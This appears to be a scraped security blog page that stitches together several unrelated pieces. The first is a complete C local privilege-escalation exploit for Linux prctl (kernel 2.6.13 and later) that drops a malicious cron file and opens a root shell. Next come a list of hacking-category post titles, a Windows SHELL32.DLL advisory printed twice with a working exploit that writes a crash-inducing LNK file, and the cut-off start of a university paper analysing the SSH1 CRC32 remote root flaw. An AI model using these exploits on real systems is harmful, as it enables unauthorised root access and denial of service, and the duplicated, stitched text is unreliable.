/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploitn"
"SHELL=/bin/shn"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %dn";
char cronstring[BUFSIZE];
char fname[BUFSIZE];
struct timeval te;
void sh(int sn) {
execl(fname, fname, (char *) NULL);
}
int main(int argc, char *argv[]) {
int nw, pid;
if (geteuid() == 0) {
printf("[+] getting root shelln");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}
printf("nprctl() suidsafe exploitnn(C) Julien TINNESnn");
/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploitn");
}
if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handlern");
/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}
/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?n");
return 1;
}
printf("[+] We are suidsafe dumpable!n");
/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too smalln");
return 1;
}
printf("[+] Malicious string forgedn");
if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}
if (pid == 0) {
/* This is not the good way to do it ;) */
sleep(120);
exit(0);
}
/* SEGFAULT the child */
printf("[+] Segfaulting childn");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)n", 60 - (te.tv_sec%60));
sleep(120);
printf("[-] It looks like the exploit failedn");
return 1;
}
Search Results for '해킹&보안'
207 posts related to '해킹&보안'
- 2009/09/30 Linux >= 2.6.13 prctl kernel exploit
- 2009/09/30 Windows SHELL32.DLL Denial of Service exploit
- 2009/09/30 SSH1 remote root exploit
- 2009/09/30 쉘코드 제작해주는 프로그램 소스
- 2009/09/30 PHP-Nuke 'cid' SQL Injection
- 2009/09/30 Linux Kernel PRCTL Core Dump Handling (>= 2.6.13 && < 2.6.17.4)
- 2009/09/30 IDAutomation Bar Code ActiveX Multiple Remote Vulnerabilities
- 2009/09/30 MS Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC
- 2009/09/30 윈도우 XP의 버그를 이용하여 폴더내용 날리기 1
- 2009/09/30 리모트에서 명령어 실행시키기 -cmd에서
- 2009/09/30 IIS 서버의 SQL injection 공격시 로그 안남기기
- 2009/09/30 FTP의 보안 취약점 IRC Lecture -번역 : By Zenky
- 2009/09/30 해킬툴 모음 입니다. 2008 버전 2
- 2009/09/30 국정원 8대 홈페이지 취약성, OWASP 10대 위협..알고계신가요?
- 2009/09/30 wwwhack(웹핵) 7
- 2009/09/30 중국의 All in One 해킹툴 1
- 2009/09/30 레지스트리에서 물리적인 메모리를 추출하는 소스
- 2009/09/30 Ptsec 툴
- 2009/09/30 여러가지 훜 기법들과 탐지법들
- 2009/09/30 [자동 저장 문서]프로그래밍단에서 커널단 접근 및 프로세스 숨김
- 2009/08/28 hosts 파일을 이용한 사이트 차단방법 1
- 2009/08/27 보안(원문) - SECURING YOUR UNIX SYSTEMS
- 2009/08/27 웹방화벽으로 DDOS막기 1
- 2009/08/27 MS09-009
- 2009/08/27 [r.5.7.p.h.p]분석
- 2009/08/27 [PHP]mb_ereg_replace()
- 2009/08/27 SQL쿼리로 사용되는 파라미터의 값이 중복 사용될 경우 조합되어 쿼리문으로 동작할 수 있다
- 2009/08/27 MASS-SQL인젝션 툴에 등록된 공격문
- 2009/08/27 웹나이트 설치 후, 반드시 해야 할 일 두 가지
- 2009/08/27 ‘About Windows Security’ 카테고리에 등록된 글 모두 보기
###########################################################################################
~ I2S LAB Security Advisory ~
###########################################################################################
http://www.I2S-LAB.com
Date : 12 / 03 / 2003
Affected systems : Microsoft Windows 2000 SP4 and below
Vendor : http://www.microsoft.com
Issue : Attackers can turn a media (directory, drive, mail, ...) into a remote bomb crashing any application
which would try to acces it using SHELL32.DLL library (explorer, IE, outlook).
Description
___________
SHELL32.DLL is a library which contains windows system functions used to open web pages, documents and
obtain informations on file associations.
That library is used by most standard applications to browse directories to search for a specific file
(a perfect example being the FILE->Open menu command available in most applications).
Technical Details
_________________
As a user browses through his hard-drive, Windows automatically analyses every file of the current directory,
so as to allow the system to display the matching icon as well as file informations.
When Windows must analyse a shortcut (*.lnk), the system determines the properties of the file indicated by the link
using its structure (see: The Windows Shortcut File Format at http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf).
Here is the structure of a windows link as we have designed it:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-------------------------------------------------------------------+
| Shortcut HEADER |
+-------------------------------------------------------------------+
00000000 4C00 0000 L... 'L' Magic value
00000004 0114 0200 .... GUID of shurtcut files
00000008 0000 0000 ....
00000008 C000 0000 ....
00000010 0000 0046 ...F
00000014 8900 0000 .... Flag
00000018 2000 0000 ... File attribute
0000001C A0C3 D5A8 .... Time 1
00000020 478E C301 G...
00000024 A0C3 D5A8 .... Time 2
00000028 478E C301 G...
0000002C A0C3 D5A8 .... Time 3
00000030 478E C301 G...
00000034 0000 0000 .... File length (here 0 bytes)
00000038 0000 0000 .... Icone number (no icon for us)
0000003C 0100 0000 .... Normal window
00000040 0000 0000 .... shortcut (no)
00000044 0000 0000 .... unknow/reserved
00000048 0000 0000 .... unknow/reserved
+-------------------------------------------------------------------+
| Item Id List |
+-------------------------------------------------------------------+
0000004C 4600 F. Size of item id list
+-------------------------------------------------------------------+
| First item |
+-------------------------------------------------------------------+
0000004E 1400 .. Lenght of first item
00000050 1F50 .P ???
00000052 E04F D020 .O. File lenght
00000056 EA3A 6910 .:i. ???
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:..
0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
0000008A 7574 2E74 7874 0000 ut.txt..
+-------------------------------------------------------------------+
| vulnerable bytes |
+-------------------------------------------------------------------+
00000092 0000 0900 .... name lenght
00000096 2E00 ..
00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 .k.u.t...t.x.t. name in wide char `
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
00000108 0000 0000 00 .....
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If we modify the name length at the offset 0x92, SHELL32.DLL will cause an access violation error,
because text was about to be written outside of the the buffer allocated on the heap for this operation.
demonstration
_____________
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>mkdir crash-test
C:>TrapLink.exe c:crash-test
################################
TrapLink SHELL32.dll DoS exploit
################################
By I2S-LAB Team.
http://www.I2S-LaB.com
c:crash-test is now trapped with a malicious LNK file
C:>start explorer.exe c:crash-test
(618.408): Access violation - code c0000005 (!!! second chance !!!)
eax=0013ffe0 ebx=70c18871 ecx=00003ee0 edx=00012eba esi=0012a000 edi=00143318
eip=77583411 esp=03e5ea8c ebp=03e5eab8 iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000213
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:WINNTsystem32SHELL32.dll - SHELL32!Ordinal18+0x25:
77583411 f3a5 rep movsd ds:0012a000=???????? es:00143318=00000065
775833ff e89effffff call SHELL32!Ordinal196 (775833a2)
77583404 85c0 test eax,eax
77583406 7412 jz SHELL32!Ordinal18+0x2e (7758341a)
77583408 8bcf mov ecx,edi
7758340a 8bf8 mov edi,eax
7758340c 8bd1 mov edx,ecx
7758340e c1e902 shr ecx,0x2
77583411 f3a5 rep movsd ds:000f8000=???????? es:00107040=00000000 <-- crash
77583413 8bca mov ecx,edx
77583415 83e103 and ecx,0x3
77583418 f3a4 rep movsb
7758341a 5f pop edi
7758341b 5e pop esi
7758341c c20400 ret 0x4
Exploits
________
/****************************************
* TrapLink for SHELL32.DLL DoS Exploit *
****************************************
Discovered & coded by I2S-LaB
________________________________________
URL : http://www.I2S-LaB.com
MAIL: contact[at]I2S-LaB.com
________________________________________
*****************************************/
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE TrapFile;
DWORD NumberOfBytesWritten;
unsigned char LnkCrash[] =
"x4Cx00x00x00x01x14x02x00x00x00x00x00xC0x00x00x00"
"x00x00x00x46x89x00x00x00x20x00x00x00xA0xC3xD5xA8"
"x47x8ExC3x01xA0xC3xD5xA8x47x8ExC3x01xA0xC3xD5xA8"
"x47x8ExC3x01x00x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x46x00x14x00"
"x1Fx50xE0x4FxD0x20xEAx3Ax69x10xA2xD8x08x00x2Bx30"
"x30x9Dx19x00x23x43x3Ax5Cx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x51x84x17x00x32x00x00"
"x00x00x00x49x2Fx87x4Bx20x00x6Bx75x74x2Ex74x78x74"
"x00x00xFFxFFx09x00x2Ex00x5Cx00x6Bx00x75x00x74x00"
"x2Ex00x74x00x78x00x74x00x60x00x00x00x03x00x00xA0"
"x58x00x00x00x00x00x00x00x69x32x73x2Dx77x32x6Bx00"
"x00x00x00x00x00x00x00x00x6ExA1xE9xB2x1Bx23x6Bx46"
"xB8x04x8Ex43xF3x38x56xF0x0ExDCxEBx90xA1xF8xD7x11"
"xA4x1Bx00xEExB0x00xDAxC9x6ExA1xE9xB2x1Bx23x6Bx46"
"xB8x04x8Ex43xF3x38x56xF0x0ExDCxEBx90xA1xF8xD7x11"
"xA4x1Bx00xEExB0x00xDAxC9x00x00x00x00";
printf ("################################n"
"TrapLink SHELL32.dll DoS exploitn"
"################################n"
"By I2S-LAB Team.nn"
"http://www.I2S-LaB.comnn" );
if (!argv[1])
printf ("Usage : TrapLink <path to trap>n", argv[0]);
else
{
if ( !SetCurrentDirectory(argv[1]) )
printf ("Error : %s is not a valid directory to trapn", argv[1] );
else
{
TrapFile = CreateFile("I2S-Crash.lnk",
GENERIC_WRITE, 0,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL );
if (TrapFile == INVALID_HANDLE_VALUE)
printf ("Error : cannot create malicious file.n");
else
{
WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL);
printf ("%s is now trapped with a malicious LNK filen", argv[1] );
}
}
}
}
Solution
________
Microsoft was notified on 11/17/2003 and have agreed to fix this as part of the next service pack.
credits
_______
Aur?ien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com
~ I2S LAB Security Advisory ~
###########################################################################################
http://www.I2S-LAB.com
Date : 12 / 03 / 2003
Affected systems : Microsoft Windows 2000 SP4 and below
Vendor : http://www.microsoft.com
Issue : Attackers can turn a media (directory, drive, mail, ...) into a remote bomb crashing any application
which would try to acces it using SHELL32.DLL library (explorer, IE, outlook).
Description
___________
SHELL32.DLL is a library which contains windows system functions used to open web pages, documents and
obtain informations on file associations.
That library is used by most standard applications to browse directories to search for a specific file
(a perfect example being the FILE->Open menu command available in most applications).
Technical Details
_________________
As a user browses through his hard-drive, Windows automatically analyses every file of the current directory,
so as to allow the system to display the matching icon as well as file informations.
When Windows must analyse a shortcut (*.lnk), the system determines the properties of the file indicated by the link
using its structure (see: The Windows Shortcut File Format at http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf).
Here is the structure of a windows link as we have designed it:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-------------------------------------------------------------------+
| Shortcut HEADER |
+-------------------------------------------------------------------+
00000000 4C00 0000 L... 'L' Magic value
00000004 0114 0200 .... GUID of shurtcut files
00000008 0000 0000 ....
00000008 C000 0000 ....
00000010 0000 0046 ...F
00000014 8900 0000 .... Flag
00000018 2000 0000 ... File attribute
0000001C A0C3 D5A8 .... Time 1
00000020 478E C301 G...
00000024 A0C3 D5A8 .... Time 2
00000028 478E C301 G...
0000002C A0C3 D5A8 .... Time 3
00000030 478E C301 G...
00000034 0000 0000 .... File length (here 0 bytes)
00000038 0000 0000 .... Icone number (no icon for us)
0000003C 0100 0000 .... Normal window
00000040 0000 0000 .... shortcut (no)
00000044 0000 0000 .... unknow/reserved
00000048 0000 0000 .... unknow/reserved
+-------------------------------------------------------------------+
| Item Id List |
+-------------------------------------------------------------------+
0000004C 4600 F. Size of item id list
+-------------------------------------------------------------------+
| First item |
+-------------------------------------------------------------------+
0000004E 1400 .. Lenght of first item
00000050 1F50 .P ???
00000052 E04F D020 .O. File lenght
00000056 EA3A 6910 .:i. ???
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:..
0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
0000008A 7574 2E74 7874 0000 ut.txt..
+-------------------------------------------------------------------+
| vulnerable bytes |
+-------------------------------------------------------------------+
00000092 0000 0900 .... name lenght
00000096 2E00 ..
00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 .k.u.t...t.x.t. name in wide char `
+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+
000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
00000108 0000 0000 00 .....
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If we modify the name length at the offset 0x92, SHELL32.DLL will cause an access violation error,
because text was about to be written outside of the the buffer allocated on the heap for this operation.
demonstration
_____________
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>mkdir crash-test
C:>TrapLink.exe c:crash-test
################################
TrapLink SHELL32.dll DoS exploit
################################
By I2S-LAB Team.
http://www.I2S-LaB.com
c:crash-test is now trapped with a malicious LNK file
C:>start explorer.exe c:crash-test
(618.408): Access violation - code c0000005 (!!! second chance !!!)
eax=0013ffe0 ebx=70c18871 ecx=00003ee0 edx=00012eba esi=0012a000 edi=00143318
eip=77583411 esp=03e5ea8c ebp=03e5eab8 iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000213
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:WINNTsystem32SHELL32.dll - SHELL32!Ordinal18+0x25:
77583411 f3a5 rep movsd ds:0012a000=???????? es:00143318=00000065
775833ff e89effffff call SHELL32!Ordinal196 (775833a2)
77583404 85c0 test eax,eax
77583406 7412 jz SHELL32!Ordinal18+0x2e (7758341a)
77583408 8bcf mov ecx,edi
7758340a 8bf8 mov edi,eax
7758340c 8bd1 mov edx,ecx
7758340e c1e902 shr ecx,0x2
77583411 f3a5 rep movsd ds:000f8000=???????? es:00107040=00000000 <-- crash
77583413 8bca mov ecx,edx
77583415 83e103 and ecx,0x3
77583418 f3a4 rep movsb
7758341a 5f pop edi
7758341b 5e pop esi
7758341c c20400 ret 0x4
Exploits
________
/****************************************
* TrapLink for SHELL32.DLL DoS Exploit *
****************************************
Discovered & coded by I2S-LaB
________________________________________
URL : http://www.I2S-LaB.com
MAIL: contact[at]I2S-LaB.com
________________________________________
*****************************************/
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE TrapFile;
DWORD NumberOfBytesWritten;
unsigned char LnkCrash[] =
"x4Cx00x00x00x01x14x02x00x00x00x00x00xC0x00x00x00"
"x00x00x00x46x89x00x00x00x20x00x00x00xA0xC3xD5xA8"
"x47x8ExC3x01xA0xC3xD5xA8x47x8ExC3x01xA0xC3xD5xA8"
"x47x8ExC3x01x00x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x46x00x14x00"
"x1Fx50xE0x4FxD0x20xEAx3Ax69x10xA2xD8x08x00x2Bx30"
"x30x9Dx19x00x23x43x3Ax5Cx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x51x84x17x00x32x00x00"
"x00x00x00x49x2Fx87x4Bx20x00x6Bx75x74x2Ex74x78x74"
"x00x00xFFxFFx09x00x2Ex00x5Cx00x6Bx00x75x00x74x00"
"x2Ex00x74x00x78x00x74x00x60x00x00x00x03x00x00xA0"
"x58x00x00x00x00x00x00x00x69x32x73x2Dx77x32x6Bx00"
"x00x00x00x00x00x00x00x00x6ExA1xE9xB2x1Bx23x6Bx46"
"xB8x04x8Ex43xF3x38x56xF0x0ExDCxEBx90xA1xF8xD7x11"
"xA4x1Bx00xEExB0x00xDAxC9x6ExA1xE9xB2x1Bx23x6Bx46"
"xB8x04x8Ex43xF3x38x56xF0x0ExDCxEBx90xA1xF8xD7x11"
"xA4x1Bx00xEExB0x00xDAxC9x00x00x00x00";
printf ("################################n"
"TrapLink SHELL32.dll DoS exploitn"
"################################n"
"By I2S-LAB Team.nn"
"http://www.I2S-LaB.comnn" );
if (!argv[1])
printf ("Usage : TrapLink <path to trap>n", argv[0]);
else
{
if ( !SetCurrentDirectory(argv[1]) )
printf ("Error : %s is not a valid directory to trapn", argv[1] );
else
{
TrapFile = CreateFile("I2S-Crash.lnk",
GENERIC_WRITE, 0,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL );
if (TrapFile == INVALID_HANDLE_VALUE)
printf ("Error : cannot create malicious file.n");
else
{
WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL);
printf ("%s is now trapped with a malicious LNK filen", argv[1] );
}
}
}
}
Solution
________
Microsoft was notified on 11/17/2003 and have agreed to fix this as part of the next service pack.
credits
_______
Aur?ien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com
SSH1 remote root exploit
sshd CRC32 compensation attack detector vulnerability explained
March 26, 2002
Korpinen Pekka, 48179S
pkorpine@cc.hut.fi
Department of Electrical Engineering
Lyytikäinen Kalle, 47992V
kalyytik@cc.hut.fi
Department of Computer Science
Helsinki University of Technology
This paper is an analysis of a security weakness in many SSH1 server implementations. Ssh servers introduced a detection mechanism against CRC32 compensation attack. this detection function includes a design fault which enables remote hosts to write arbitrary values to server memory. The authors reverse engineered a proprietary exploit implementation and wrote their own implementation of the exploit. This paper describes the vulnerability, the exploitation process, the author's exploit implementation, and means for protecting hosts against this attack. This paper is also a project for the course 'Tik-110.452 Tietojärjestelmien käytännön turvallisuuden erikoiskurssi' at Helsinki University of Technology.
0 Table of Contents
1 Introduction - SSH protocol
2 Vulnerability in SSH1.5
2.1 Buffer overflow
2.2 Preconditions - Affected ssh daemons
2.3 Linux memory layout
3 Exploits
3.1 First incidents
3.2 Problems
3.3 Available implementations
3.4 Shellcode
4 Our exploit
4.1 Goals
4.2 Resources
4.3 Process
4.3.1 Reverse Engineering
4.3.2 Packet sending
4.3.3 Finding distance to 'buf'
4.3.4 Finding distance to kernel space
4.3.5 Sending shellcode
4.3.6 Executing shellcode
4.4 Using exploit
4.5 Advantages and Disadvantages
5 Counter actions
5.1 Detecting attacks
5.2 Required actions after being attacked
5.3 Preventive actions
6 References
7 Appendices
7.1 Shellcode
7.2 Exploit usage
7.3 Source code files for the exploit
7.3.1 packet.diff
7.3.2 uxp2.c
1 Introduction - SSH protocol
The SSH (Secure Shell) protocol provides a standardized way to communicate on a secured channel. All communications between SSH client and SSH daemon are encrypted. The encryption is done using a symmetric cipher (DES, 3DES and Blowfish, for example). The encryption key is exchanged at the beginning of the connection using RSA keys.
The (SSH) client creates a connection to the (SSH) server which is listening on a specific port, usually 22. The server accepts the connection and responds by sending back its version identification string. The client sends its own identification. After both sides have been identificated they switch to a packet based binary protocol. The server sends its host key. The host key is a unique RSA key used to authenticate the host and it is regenerated every hour. The client generates a 256 bit session key, encrypts it using both RSA keys, and sends the encrypted session key and selected cipher type to the server. Now both sides turn on encryption using the selected encryption algorithm and key. Finally the server sends an encrypted confirmation message. At this point the channel is secured. The client then tries to authenticate itself using any of the available authentication methods (password, RSA authentication etc). After successful authentication, the client can allocate a pseudo tty, start port forwarding, or execute a shell command [23].
When the client or the server receives an encrypted packet, it checks if the packet is tampered with using the crc32 compensation attack detector. The detection algorithm checks the packet before it is parsed in any way. The first case when this algorithm is used is when the client sends its authentication request.
Maximum packet length is about 256k bytes.
2 Vulnerability in SSH1.5
The crc32 compensation attack detector in various SSH versions has a bug that allows an evil attacker to write to memory locations on the server side. If the packets are smartly constructed, they may allow code to be executed on the server side. Because the server is usually being run under the root account, this vulnerability gives the attacker root access to the host.
The memory writing and running a code on the host can be inspected as the casual buffer overflow exploits even though in this case the buffer overflow is not such straightforward to do as usually.
2.1 Buffer overflow
Buffer overflow exploits are based on the fact that the return address of currently running function is kept on the stack. When a function wants to make a function call, it pushes its current instruction pointer to the stack (among other possible data) and jumps to the address of the callee. When the callee reaches it's end (e.g. return-clause in C) it retrieves the stored instruction pointer from the stack and makes a jump to it. Now the caller can continue it's execution. If the return address is manipulated during the execution of the callee, the point of execution is transferred to a different location when the callee returns. This makes the running of inserted code possible.
If we are inserting data on a statically allocated buffer we must be sure that the buffer can hold the all data (e.g. strlen(data) < strlen(buffer)). Usually progammer's won't check the length of the source because they are making assumptions of the length. If the source's length is greater than the buffer size, the buffer is overflown. Because the statically allocated buffers are usually kept on the stack, this allows the source data to overwrite the return address.
[Example:] If a program has a buffer, say 128 bytes in length. The program reads an argument from the command-line. The argument is supposedly be a password, so the 128 bytes is surely enough - no need to check. The main function calls a subfunction with the command line parameter as an in-argument. The subfunction has the mentioned buffer and it simply copies the argument to the buffer (without length checking!). This works ok if the source length is below 128 bytes. An evil attacker could overflow the buffer easily because of the lack of checks. He runs the program with an argument that is longer than 128 bytes. This causes the buffer to overflow.
The argument:
[NNNNNNNNNSSSSSSSSSSSJJJJJJJJJJJJJJJJJJJJJJJ]
The buffer in the stack with the return address:
[xxxxxxxxxxxxxxxxxxxxxxx]....[RET]...
The buffer after overflow:
[NNNNNNNNNSSSSSSSSSSSJJJ]....[ J ]...
The return address is overwritten with a value J. The specific location of the return address is unknown to the attacker. He can make a so-called NOP sled (marked as N) before the actual shellcode (S). NOP is a special instruction that doesn't do anything. In this way, the jump can be a guess and if the jump lands on the NOP sled, it slides to the beginning of the actual shellcode.
When the sub-function is ready to return (and when the return address is accidentally overwritten!), the program jumps to the address specified on the return address field in the stack. The point of execution is now pointing on the NOP sled and the shellcode is executed. The shellcode can now for example open a new shell or a telnetable back port on the host. This is all done on the same account as the program was run. [End of example] [1]
2.2 Preconditions - Affected ssh daemons
The following versions are reported to be vulnerable:
SSH-1.5-1.2.24 .. 31
SSH-1.5-1.3.6 .. 10
SSH-1.5-1.3.6
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.1
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3
SSH-1.99-2.0.11 (with Version 1 fallback)
SSH-1.99-2.0.12 (with Version 1 fallback)
SSH-1.99-2.0.13 (with Version 1 fallback)
SSH-1.99-2.1.0.pl2 (with Version 1 fallback)
SSH-1.99-2.1.0 (with Version 1 fallback)
SSH-1.99-2.2.0 (with Version 1 fallback)
SSH-1.99-2.3.0 (with Version 1 fallback)
SSH-1.99-2.4.0 (with Version 1 fallback)
SSH-1.99-3.0.0 (with Version 1 fallback)
SSH-1.99-3.0.1 (with Version 1 fallback)
SSH-1.5-OpenSSH-2.1
SSH-1.5-OpenSSH_2.1.1
SSH-1.5-OpenSSH_2.2.0
SSH-1.5-OpenSSH_2.2.0p1
One can check the vulnerability by sending a long enough login name with a client (Note. newest clients check the length by themselves). If the server just crashes, the server is vulnerable. Long enough is 88 000 characters.
There also exists a perl script that does the checking automatically. [2]
2.3 Linux memory layout
The linux memory layout is in crucial role in this exploit. One must know something about the architecture. The figure below shows the general layout of the memory seen by an user process:
top of memory
0xffff ffff ____________________
| |
| KERNEL | No read/write
|____________________|
0xc000 0000 | |
| STACK | read/write
|____________________|
| |
| LIBRARIES |
0x4000 0000 |____________________|
| |
| HEAP | read/write (malloc)
|____________________|
| |
| BSS | read/write
|____________________|
| |
| DATA | read/write
|____________________|
| |
| TEXT (aka CODE) | read, no write
0x0800 0000 |____________________|
| |
| KERNEL | No read/write
|____________________|
0x0000 00000
bottom of memory
The addresses are in the absolute form. The stack grows down (i.e. to smaller addresses) and heap grows up. Dynamically allocated arrays are created on heap (size < 128kB, address are form of 0x080x xxxx) or on the library area (size > 128kB, address are form of 0x400x xxxx). The addresses of specific variables and functions during the run may vary a bit from host to host but the addresses mentioned on the figure are constants.
On linux process's memory map can be seen by running cat /proc//maps. It displays addresses, sizes, attributes (read, write, execute), and the sources of loaded programs and libraries. The readelf utility can be used to see how the linker has organized the objects. [3] [4]
3 Exploits
The exploit is based entirely on the detect_attack() function in the SSH implementation. The function should detect the crc32 compensation attack but it introduces another security vulnerability.
Critical parts of the detect_attack() function:
--------------------------------------------------------
int detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
..
static u_int16_t *h = (u_int16_t *) NULL;
static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
register u_int32_t i, j;
u_int32_t l;
..
#1 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
;
if (h == NULL) {
debug("Installing crc compensation attack detector.");
#2 n = l;
h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
..
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
#3 for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
i = (i + 1) & (n - 1)) {
if (h[i] == HASH_IV) {
if (!CMP(c, IV)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
#4 } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
}
#5 h[i] = j;
}
return (DEATTACK_OK);
}
--------------------------------------------------------
The function is called after each received SSH packet. The 'buf' argument is the buffer where incoming (encrypted) packet's payload is located, 'len' is the length of the buffer (note: the length is delivered on the ssh-packet, so the actual buffer could be longer). The 'IV' is always NULL.
The problem resides on the #2 where a 32-bit integer ('l') is assigned on a 16-bit integer ('n'). If the lower word of the 'l' is zero, the 'n' is assigned to zero. The 'l' is calculated on #1, and is dependant on the 'len' variable. If the 'len' is bigger than about 88000, the 'n' is set to zero.
Then the 'h' is allocated with call to malloc and the requested becomes to zero because n==0. The allocated size is the minimum allocation block. This is 12 bytes in current linux platforms.
The outer for-loop (near #3) goes through the whole packets. The variable 'j' is the block number (blocks are 8 bytes long). On #3 the HASH()-macro gets the first 32-bits from the current block. Because the 'n' is zero the (n-1)-clause is evaluated as 0xffff. So, the variable 'i' has the first 32-bits of the current block.
